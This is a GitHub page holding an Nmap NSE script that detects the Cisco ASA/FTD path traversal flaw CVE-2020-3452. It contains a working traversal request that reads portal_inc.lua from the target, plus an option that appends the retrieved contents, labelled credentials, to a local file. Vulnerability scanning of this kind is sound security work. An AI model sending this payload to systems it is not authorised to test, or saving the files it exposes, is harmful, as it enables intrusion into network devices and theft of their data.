-
Notifications
You must be signed in to change notification settings - Fork 50
/
http-vuln-cve2020-3452.nse
109 lines (101 loc) · 5.48 KB
/
http-vuln-cve2020-3452.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local table = require "table"
local string = require "string"
local vulns = require "vulns"
local nmap = require "nmap"
local io = require "io"
description = [[
This NSE script checks whether the target server is vulnerable to CVE-2020-3452
]]
---
-- @usage
-- nmap --script http-vuln-cve2020-3452 -p <port> <host>
-- nmap --script http-vuln-cve2020-3452 -p <port> <host> --script-args output='file.txt'
-- @output
-- PORT STATE SERVICE
-- 443/tcp open http
-- | CVE-2020-3452:
-- | Host is vulnerable to CVE-2020-3452
-- @changelog
-- 01-07-2020 - Discovery: Mikhail Klyuchnikov & Ahmed Aboul-Ela
-- 05-07-2020 - Author: Dhiraj Mishra --[[ NMAP Script--]]
-- @xmloutput
-- <table key="NMAP-1">
-- <elem key="title">Cisco Adaptive Security Appliance and FTD Unauthorized Remote File Reading</elem>
-- <elem key="state">VULNERABLE</elem>
-- <table key="description">
-- <elem>A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="year">2020</elem>
-- <elem key="day">22</elem>
-- <elem key="month">07</elem>
-- </table>
-- </table>
-- <elem key="disclosure">01-07-2020</elem>
-- <table key="extra_info">
-- </table>
-- <table key="refs">
-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2020-3452</elem>
-- <elem>https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86</elem>
-- </table>
-- </table>
author = "Dhiraj Mishra (@RandomDhiraj)" --[[ NMAP Script--]]
Discovery = "Mikhail Klyuchnikov & Ahmed Aboul-Ela"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "intrusive","vuln"}
portrule = shortport.ssl
action = function(host,port)
local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil
local vuln = {
title = 'CISCO ASA/FTD Read-Only Path Traversal Vulnerability',
state = vulns.STATE.NOT_VULN,
description = [[
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
]],
references = {
'https://nvd.nist.gov/vuln/detail/CVE-2020-3452',
'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86',
},
dates = {
disclosure = {year = '2020', month = '07', day = '22'},
},
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local path = "/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
local response
local output = {}
local success = "Host is vulnerable to CVE-2020-3452"
local fail = "Host is not vulnerable"
local match = 'INTERNAL_PASSWORD_ENABLED'
local credentials
local CASA
response = http.get(host, port.number, path)
if not response.status then
stdnse.print_debug("Request Failed")
return
end
if response.status == 200 then
if string.match(response.body, match) then
stdnse.print_debug("%s: %s GET %s - 200 OK", SCRIPT_NAME,host.targetname or host.ip, path)
vuln.state = vulns.STATE.VULN
CASA = (("Verify arbitrary file read: https://%s:%d%s"):format(host.targetname or host.ip,port.number, path))
if outputFile then
credentials = response.body:gsub('%W','.')
vuln.check_results = stdnse.format_output(true, CASA)
vuln.extra_info = stdnse.format_output(true, "Credentials are being stored in the output file")
file = io.open(outputFile, "a")
file:write(credentials, "\n")
else
vuln.check_results = stdnse.format_output(true, CASA)
end
end
elseif response.status == 403 then
stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname or host.ip, path, response.status)
vuln.state = vulns.STATE.NOT_VULN
end
return vuln_report:make_output(vuln)
end